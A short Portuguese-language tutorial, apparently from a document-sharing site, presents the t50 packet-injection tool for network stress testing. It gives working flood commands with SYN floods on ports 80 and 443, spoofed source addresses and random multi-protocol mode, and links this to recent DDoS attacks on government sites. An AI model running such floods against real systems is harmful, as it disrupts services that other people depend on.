Baixe o app para aproveitar ainda mais
Prévia do material em texto
Conheça o t50: Ferramenta para stress test (Pentest DDoS)! O t50, uma ferramenta desenvolvida pelo brasileiro Nelson Brito, é na prática um software capaz de realizar stress tests em redes ou servidores específicos utilizando a técnica de injeção de pacotes mesclando até 15 protocolos diferentes (TCP, UDP, ICMP, IGMPv2, IGMPv3, EGP, DCCP, RSVP, RIPv1, RIPv2, GRE, ESP, AH, EIGRP, OSPF, etc…). Em outras palavras, qualquer sysadmin pode utilizar esta ferramenta para realizar testes de penetração em servidores utilizando um mix de ataques do tipoDDoS (Distributed Denial of Service) – Basicamente como ocorreu nos episódios dos últimos dias em sites do governo federal, quando crackers utilizaram técnicas do tipo. Obviamente que, como toda ferramenta do gênero, o t50 pode ser utilizado tanto pelo “lado negro da força”, quanto para antever falhas críticas de segurança nos serviços que rodam na sua rede. Como usar Vamos explorar um pouco o T50 ./t50 192.168.1.10 --flood --turbo --dport (80 443) -S --protocol TCP Neste o atacante flooda o IP, adiciona turbo, ataca as portas 80 e 443, usando apenas SYN no protocolo TCP ./t50 192.168.1.12 --flood --turbo --dport (80) -S -s 10.10.0. --protocol TCP Neste o atacando flooda o IP, adiciona turbo, ataca a porta 80 usando apenas SYN e mascara a origem com o range 10.10.0.x no protocolo TCP --protocol T50 Faz um random de todos os protocolos --sport 80 --dport 443 Ataca através da porta de origem 80 no alvo 443 Quanto mais específico o ataque melhor, mais destrutivo. Faça um teste, crie 2 maquinas virtuais e faça o ataque. Monitore com o Htop ou iptraf e vc verá a diferença Download http://sourceforge.net/projects/t50/
Compartilhar